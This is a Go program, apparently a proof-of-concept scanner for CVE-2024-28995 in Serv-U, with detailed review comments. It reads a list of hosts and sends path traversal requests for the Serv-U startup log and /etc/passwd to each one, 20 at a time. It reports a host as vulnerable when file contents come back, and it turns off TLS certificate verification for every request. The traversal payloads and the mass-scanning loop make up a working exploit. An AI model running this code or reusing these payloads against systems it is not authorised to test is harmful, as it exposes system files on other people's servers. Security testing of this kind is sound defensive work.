package main
import (
"net/http"
"crypto/tls"
"os"
"fmt"
"bufio"
"io"
"strings"
"errors"
"sync"
)
// ANSI escape sequences used to colour the result lines on a terminal.
// Reset restores the default colour and is written after each coloured
// segment.
var (
	Reset  = "\033[0m"
	Red    = "\033[31m"
	Green  = "\033[32m"
	Yellow = "\033[33m"
)
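// makeReq issues a GET for url and returns the response body as a string.
//
// An error is returned when the request itself fails, when the response
// status is anything other than 200, or when reading the body fails. On
// error the returned string is always empty.
func makeReq(url string) (string, error) {
	// Upper bound on how much of a response is buffered. The body comes from
	// a remote host that is not trusted, so an endless or very large reply
	// must not be able to exhaust memory. Anything past the limit is dropped.
	const maxBodyBytes = 10 << 20

	// NOTE(review): http.Get goes through http.DefaultClient, which has no
	// timeout unless one is configured elsewhere; a host that accepts the
	// connection and then stalls keeps this call open.
	resp, err := http.Get(url)
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()

	if resp.StatusCode != http.StatusOK {
		return "", errors.New("http.Status is not 200")
	}

	bodyBytes, err := io.ReadAll(io.LimitReader(resp.Body, maxBodyBytes))
	if err != nil {
		return "", err
	}
	return string(bodyBytes), nil
}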
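// checkIfPathExists probes one host for CVE-2024-28995 and prints a single
// verdict line for it.
//
// baseUrl is the host as read from the target list; it is prefixed with
// "https://" and each probe path is appended to it. wg is signalled and one
// slot of semaphore is released when the function returns, whichever way it
// returns.
//
// A host is reported as vulnerable when a probe comes back with status 200
// and the body contains a marker string from the file that probe asks for.
// "Not Vulnerable" is also printed when every request failed (unreachable
// host, TLS failure, non-200 status), so that line on its own is not evidence
// that the host is patched.
func checkIfPathExists(baseUrl string, wg *sync.WaitGroup, semaphore chan struct{}) {
	defer wg.Done()
	// Release the concurrency slot on every exit path. Releasing it only at
	// the end of the function leaks a slot on each early return, and once all
	// slots are leaked the sender on this channel blocks forever.
	defer func() { <-semaphore }()

	pathsToCheck := []string{"/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "/?InternalDir=\\..\\..\\..\\etc&InternalFile=passwd"}
	// Account names looked for at the start of a passwd entry.
	linuxMarkers := []string{"root:x", "bin:x", "admin:x", "sys:x"}

	for _, path := range pathsToCheck {
		bodyStr, err := makeReq("https://" + baseUrl + path)
		if err != nil {
			// One failed probe says nothing about the other: the two paths
			// ask for files from different platforms, so keep going instead
			// of declaring the host not vulnerable after the first failure.
			continue
		}

		if strings.Contains(bodyStr, "Operating System: Windows Server") {
			fmt.Printf("%s[+] Vulnerable Windows Device : %s%s\n", Green, baseUrl, Reset)
			return
		}
		for _, marker := range linuxMarkers {
			if strings.Contains(bodyStr, marker) {
				fmt.Printf("%s[+] Vulnerable Linux Device : %s%s\n", Green, baseUrl, Reset)
				return
			}
		}
	}

	// No probe produced a marker. This covers both "answered without the
	// file contents" and "never answered at all".
	fmt.Printf("%s[-] Not Vulnerable : %s%s\n", Red, baseUrl, Reset)
}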
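// main prints the banner, loads the target list from ips.txt (one host per
// line) and checks every host, running at most maxConcurrent checks at a
// time. It panics if ips.txt cannot be opened or read.
func main() {
	fmt.Println(`
::: ::: ::::::::: :::::::: ::: ::: ::::::::: ::::::::::: ::::::: :::: :::
:+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+:+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ :+:+ :+:+:+ +:+
+#++:++ +#++:++#: +#++: +#++: +#++:++#+ +#+ +#+ + +:+ +#+ +:+ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+# +#+ +#+ +#+#+#
#+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+#+#
### ### ### ### ######## ### ### ### ####### ### ####
-> CVE-2024-28995 (PoC)
-> https://github.com/krypton-kry/CVE-2024-28995
`)

	// Certificate verification is switched off for every request made through
	// the default transport. Responses therefore cannot be authenticated: a
	// party on the network path could alter a body, so each verdict is only
	// as trustworthy as the path to the host. The type assertion panics if
	// http.DefaultTransport has been replaced with another implementation.
	http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{InsecureSkipVerify: true}

	file, err := os.Open("ips.txt")
	if err != nil {
		panic(err)
	}
	defer file.Close()

	var ips []string
	scanner := bufio.NewScanner(file)
	for scanner.Scan() {
		// Drop surrounding whitespace and skip blank lines so that an empty
		// entry is not turned into a request with no host.
		if host := strings.TrimSpace(scanner.Text()); host != "" {
			ips = append(ips, host)
		}
	}
	// Scan stops silently on a read error or an over-long line; without this
	// check the run would continue with a truncated target list.
	if err := scanner.Err(); err != nil {
		panic(err)
	}

	// Number of hosts checked at the same time. The buffered channel acts as
	// a counting semaphore: a slot is taken here before each goroutine is
	// started and the send blocks while all slots are in use.
	const maxConcurrent = 20
	semaphore := make(chan struct{}, maxConcurrent)
	wg := &sync.WaitGroup{}
	for _, ip := range ips {
		semaphore <- struct{}{}
		wg.Add(1)
		go checkIfPathExists(ip, wg, semaphore)
	}
	wg.Wait()
}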